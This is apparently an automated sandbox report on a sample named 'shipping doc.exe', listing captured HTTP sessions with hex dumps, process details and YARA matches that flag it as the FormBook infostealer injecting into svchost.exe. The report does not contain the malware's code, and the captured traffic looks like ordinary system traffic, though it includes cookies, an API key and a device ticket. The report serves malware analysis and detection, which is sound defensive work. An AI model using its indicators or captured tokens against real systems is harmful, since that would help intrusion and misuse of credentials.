                                                                                            2024-05-03 11:13:18 UTC959INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                                            Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449750172.217.165.1324437352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:18 UTC912OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGMyN07EGIjACfJfOCNaD4TISjycM0JORvJFhG5ZwTBYCNVHc3-u05-7gGaBns57LrR4GTdhD_MIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                            Sec-Fetch-Site: cross-site
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cookie: 1P_JAR=2024-05-03-11; NID=513=nJj-S8UBL5rusEPCKRTLlqPgaIU4uNvC17_1t0-Ydx42a1bdjTYSiuzvESpni9PvJPiQepp5rg-WTAJ_F4gbdYK1NhfKY851tDnH1YbxwN1YCCCs2bZYebUVXnKFbT9OyCVmnF0Qf-0NgbqO3isVsKwS4xukaXc-Wh1b3kgw4yU
                                                                                            2024-05-03 11:13:18 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                            Date: Fri, 03 May 2024 11:13:18 GMT
                                                                                            Pragma: no-cache
                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Content-Type: text/html
                                                                                            Server: HTTP server (unknown)
                                                                                            Content-Length: 3185
                                                                                            X-XSS-Protection: 0
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-05-03 11:13:18 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                            2024-05-03 11:13:18 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 67 55 39 77 39 63 65 58 6b
                                                                                            Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="gU9w9ceXk
                                                                                            2024-05-03 11:13:18 UTC1031INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                                            Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.44975423.51.58.94443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:22 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            Accept-Encoding: identity
                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                            Host: fs.microsoft.com
                                                                                            2024-05-03 11:13:22 UTC467INHTTP/1.1 200 OK
                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                            Content-Type: application/octet-stream
                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                            Server: ECAcc (chd/073D)
                                                                                            X-CID: 11
                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                            X-Ms-Region: prod-weu-z1
                                                                                            Cache-Control: public, max-age=244226
                                                                                            Date: Fri, 03 May 2024 11:13:22 GMT
                                                                                            Connection: close
                                                                                            X-CID: 2


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.44975523.51.58.94443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:23 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            Accept-Encoding: identity
                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                            Range: bytes=0-2147483646
                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                            Host: fs.microsoft.com
                                                                                            2024-05-03 11:13:23 UTC456INHTTP/1.1 200 OK
                                                                                            ApiVersion: Distribute 1.1
                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                            Content-Type: application/octet-stream
                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                            Server: ECAcc (chd/0778)
                                                                                            X-CID: 11
                                                                                            Cache-Control: public, max-age=244225
                                                                                            Date: Fri, 03 May 2024 11:13:23 GMT
                                                                                            Content-Length: 55
                                                                                            Connection: close
                                                                                            X-CID: 2
                                                                                            2024-05-03 11:13:23 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.44975640.68.123.157443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:29 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fsZwPuD23+uHrV4&MD=xhxUnwp5 HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                            Host: slscr.update.microsoft.com
                                                                                            2024-05-03 11:13:29 UTC560INHTTP/1.1 200 OK
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Content-Type: application/octet-stream
                                                                                            Expires: -1
                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                            MS-CorrelationId: 76349599-cae6-4f7f-a350-f58edbef3064
                                                                                            MS-RequestId: 25d58639-99ca-4112-98b7-311638059efe
                                                                                            MS-CV: WoyvOOzoW0Ktnapv.0
                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Date: Fri, 03 May 2024 11:13:28 GMT
                                                                                            Connection: close
                                                                                            Content-Length: 24490
                                                                                            2024-05-03 11:13:29 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                            2024-05-03 11:13:29 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.44975740.68.123.157443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:14:06 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fsZwPuD23+uHrV4&MD=xhxUnwp5 HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                            Host: slscr.update.microsoft.com
                                                                                            2024-05-03 11:14:07 UTC560INHTTP/1.1 200 OK
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Content-Type: application/octet-stream
                                                                                            Expires: -1
                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                            ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                            MS-CorrelationId: 0feb87dd-08f2-4040-83fd-679ad2178636
                                                                                            MS-RequestId: cd86ea46-83d2-4617-928d-66b5fcc78fdf
                                                                                            MS-CV: +4jVGi5pn0qMHSMb.0
                                                                                            X-Microsoft-SLSClientCache: 2160
                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Date: Fri, 03 May 2024 11:14:05 GMT
                                                                                            Connection: close
                                                                                            Content-Length: 25457
                                                                                            2024-05-03 11:14:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                            Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                            2024-05-03 11:14:07 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                            Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            11192.168.2.449769104.46.162.224443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:18:25 UTC828OUTPOST /OneCollector/1.0/ HTTP/1.1
                                                                                            Accept: */*
                                                                                            APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521
                                                                                            AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p=
                                                                                            Client-Id: NO_AUTH
                                                                                            Content-Encoding: deflate
                                                                                            Content-Type: application/bond-compact-binary
                                                                                            Expect: 100-continue
                                                                                            SDK-Version: EVT-Windows-C++-No-3.4.15.1
                                                                                            Upload-Time: 1714735103443
                                                                                            Host: self.events.data.microsoft.com
                                                                                            Content-Length: 7977
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2024-05-03 11:18:25 UTC7977OUTData Raw: ed 7c 4b ac 5c 47 7a de a1 24 33 14 45 51 1c 49 a3 91 34 f2 88 26 34 93 91 d5 7d 53 ef 47 23 86 87 ba bc 33 e2 44 1c 2a bc 94 34 33 80 c1 9c ee 3e dd 7d c8 ee 3e 57 fd e0 43 f0 42 98 85 01 07 f1 20 b4 11 20 c8 6a 90 85 61 01 b6 91 85 bd 88 57 4e 90 45 26 cc 26 c8 26 80 b3 48 02 04 08 82 2c 8c 20 c9 26 59 e4 ab 3a 75 ce a9 2e 5e 71 c6 83 81 e0 01 78 41 f2 f2 af aa 53 cf ff ff fe ef af aa 73 de 7c 92 ef 91 cb e2 ea 64 52 8e 8a 1b 87 f7 d6 9b 62 11 7e bd 53 e4 f3 cd ec 4a b1 c9 c7 f9 26 bf 54 dc 46 89 fd 6a b9 ae e6 25 12 8a f1 47 ff ed f7 7e f8 2f ff c5 7f f8 d3 ff f8 85 4f 2f 54 83 d1 d8 70 a5 98 52 94 8e c4 28 cf 73 33 19 c9 21 2b 34 33 45 61 e8 f8 df 9d fc c1 53 0f be 78 fa 44 79 e6 83 2b 77 f2 55 d1 3b 7f 79 39 da fb ed d3 b5 c4 48 8f 66 0f 5e 3a 7d 22
                                                                                            Data Ascii: |K\Gz$3EQI4&4}SG#3D*43>}>WCB jaWNE&&&H, &Y:u.^qxASs|dRb~SJ&TFj%G~/O/TpR(s3!+43EaSxDy+wU;y9Hf^:}"
                                                                                            2024-05-03 11:18:25 UTC25INHTTP/1.1 100 Continue
                                                                                            2024-05-03 11:18:25 UTC443INHTTP/1.1 200 OK
                                                                                            Content-Length: 9
                                                                                            Content-Type: application/json
                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            time-delta-millis: 1907
                                                                                            Access-Control-Allow-Headers: time-delta-millis
                                                                                            Access-Control-Allow-Methods: POST
                                                                                            Access-Control-Allow-Credentials: true
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                            Date: Fri, 03 May 2024 11:18:25 GMT
                                                                                            Connection: close
                                                                                            {"acc":4}


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:13:13:08
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Users\user\Desktop\shipping doc.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\shipping doc.exe"
                                                                                            Imagebase:0xe0000
                                                                                            File size:1'140'224 bytes
                                                                                            MD5 hash:7AD4C6133F4F75AE91BF07F65DC5F21A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:13:13:09
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\shipping doc.exe"
                                                                                            Imagebase:0x500000
                                                                                            File size:46'504 bytes
                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:13:13:10
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Windows\explorer.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                            Imagebase:0x7ff72b770000
                                                                                            File size:5'141'208 bytes
                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:3
                                                                                            Start time:13:13:13
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                            Imagebase:0x7ff76e190000
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

